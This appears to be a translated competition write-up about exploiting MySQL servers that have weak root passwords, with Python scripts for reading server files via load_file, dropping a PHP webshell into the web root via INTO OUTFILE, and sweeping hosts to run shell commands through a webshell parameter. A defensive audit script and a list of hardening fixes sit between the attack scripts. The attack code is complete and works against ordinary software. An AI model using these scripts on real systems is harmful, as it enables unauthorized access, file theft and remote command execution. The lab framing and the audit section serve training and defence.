  • National Vocational Skills Competition, Information Security Management and Evaluation: MySQL weak-password exploitation

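    Reading a file through MySQL

    #coding=utf-8
    import MySQLdb
    host = '172.16.1.'
    # Try 172.16.1.129 and 172.16.1.130 with the weak root/root credentials
    for i in range(129,131):
        tag = host+str(i)
        print tag+":3306"
        try:
            conn = MySQLdb.connect(host=tag,port=3306,user='root',passwd='root',db='mysql',connect_timeout=1)
            cur = conn.cursor()
            # load_file() needs the FILE privilege and a path that secure_file_priv permits
            cur.execute("select load_file('/root/flag.txt')")
            print cur.fetchone()
            cur.close()
            conn.close()
        except MySQLdb.Error:
            print 'MYSQL connect out'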

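    Writing a one-line webshell through MySQL

    #coding=utf-8
    import os
    import MySQLdb
    # Target address; the last octet is not given in the original post
    host = '172.16.1.'
    try:
        conn = MySQLdb.connect(host=host,port=3306,user='root',passwd='root',db='mysql',connect_timeout=1)
        cur = conn.cursor()
        # Stage the PHP one-liner in a table, then dump the table into the web root
        cur.execute("""create table sys(cmd text NOT NULL);""")
        cur.execute("""insert into sys(cmd)values("<?php system('cat /root/flaginfo*');?>");""")
        cur.execute("""select * from sys into outfile "/var/www/html/sys.php";""")
        conn.close()
        # Request the dropped file so the web server executes it
        os.system("curl "+host+"/sys.php")
    except MySQLdb.Error:
        print 'Mysql time out'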
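
The two MySQL scripts above only work when the server has a guessable root password, a root account reachable from other hosts, and FILE access with no secure_file_priv restriction. The audit below is an added example, not code from the original post; it assumes accounts use mysql_native_password, and the function names, candidate list and sample rows are constructed for illustration.

```python
import hashlib

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
WEAK_CANDIDATES = ["", "root", "123456", "password", "mysql"]  # assumed short list


def native_hash(password):
    """mysql_native_password hash: '*' + upper-case hex of SHA1(SHA1(password))."""
    if password == "":
        return ""  # an empty password is stored as an empty string
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def audit_mysql(accounts, secure_file_priv, candidates=WEAK_CANDIDATES):
    """Return sorted (check, detail) findings.

    accounts: rows shaped like
      SELECT user, host, file_priv, authentication_string FROM mysql.user
    secure_file_priv: @@secure_file_priv ('' = any path, None = disabled,
      otherwise the one directory allowed for load_file / INTO OUTFILE).
    """
    weak = {native_hash(p): p for p in candidates}
    findings = []
    for user, host, file_priv, auth in accounts:
        who = "%s@%s" % (user, host)
        remote = host not in LOCAL_HOSTS
        if auth in weak:
            findings.append(("weak-password", who))
        if remote and user == "root":
            findings.append(("remote-root", who))
        if remote and file_priv == "Y":
            findings.append(("remote-file-priv", who))
    if secure_file_priv == "":
        findings.append(("secure-file-priv-unrestricted", "any path"))
    return sorted(findings)


# Constructed sample rows: the root/root account the scripts above log in with,
# and a local-only application account with a strong password.
SAMPLE_ACCOUNTS = [
    ("root", "%", "Y", native_hash("root")),
    ("app", "localhost", "N", native_hash("Xq7#constructed-example")),
]

if __name__ == "__main__":
    for check, detail in audit_mysql(SAMPLE_ACCOUNTS, ""):
        print("%-30s %s" % (check, detail))
```

Each finding maps to one fix: set a strong root password, restrict root to local hosts, revoke FILE from remote accounts, and set secure_file_priv to NULL or a dedicated directory outside the web root.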

    Using the webshell

    #!/usr/bin/python
    import urllib,urllib2
    # Walk the targets 172.16.1.113 through 172.16.9.113
    for i in range(1,10):
        tag = 'http://172.16.'+str(i)+'.113/add_book.php'
        # PHP statement sent in the 'password' POST parameter
        data = {"password":"system('cat /flag');"}
        print tag
        try:
            f = urllib2.urlopen(url=tag,data=urllib.urlencode(data),timeout=1)
            flag = f.read()
            print flag[0:40]
        except Exception:
            print 'time out'
  • Original post: https://www.cnblogs.com/nul1/p/10991078.html